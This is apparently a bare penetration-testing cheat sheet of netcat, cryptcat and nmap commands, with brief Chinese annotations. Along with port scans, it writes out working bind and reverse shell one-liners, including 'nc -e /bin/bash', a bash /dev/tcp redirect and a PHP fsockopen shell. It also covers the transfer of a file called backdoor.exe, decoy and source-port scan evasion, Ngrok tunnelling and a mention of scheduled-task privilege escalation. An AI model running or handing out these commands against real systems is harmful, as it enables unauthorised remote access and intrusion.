apt-get install netcat
nc -h
nc -nvz 172.16.75.193 200
ncat -nvlp 200
nc -l -p 12345
ncat IP 12345
nc -vz scanme.nmap.org 80 25 443 22
nc -vz scanme.nmap.org http ftp smtp ssh
nc -vz scanme.nmap.org 1-200
nc -v scanme.nmap.org 22
nc -v scanme.nmap.org 80
HEAD /HTTP/1.0
ncat -l -p 2000 > backdoor.exe
nc ip 2000 < backdoor.exe
nc -w4 ip 2000 < backdoor.exe
apt-get install cryptcat
cryptcat -k pass ip 2222
cryptcat.exe -k pass -l -p 2222
tcp.port == 2222
ncat -nvlp 4444 --ssl
bind shell
nc -lvp 2000 -e cmd.exe
nc ip 2000
reverse shell
nc -lvp 2000
nc ip 2000 -e /bin/bash
ncat -lvp 2000
bash -i >& /dev/tcp/ip/2000 0>&1
ncat -lvp 2000
php -r ‘$sock=fsockopen("ip",2000);exec("/bin/sh -i <&3 >&3 2>&3");’
cryptcat.exe -l -p 4444 -e cmd.exe
cryptcat ip 4444
nmap --version
nmap -sn 发现主机
nmap -F 快速扫描
-p 1-1000 -sT -sU -sV 服务版本 -O 系统
-oN /root/Desktop/scan.txt IP -oX XML -oG Grepable
nmap -D RND:15 ip
wireshark
20 FTP 53 dns 67 dhcp
--source-port 20 ip
--data-length 30 ip
ip.src == ip
Ngrok 反代
./ngrok authtoken
payload
计划任务提权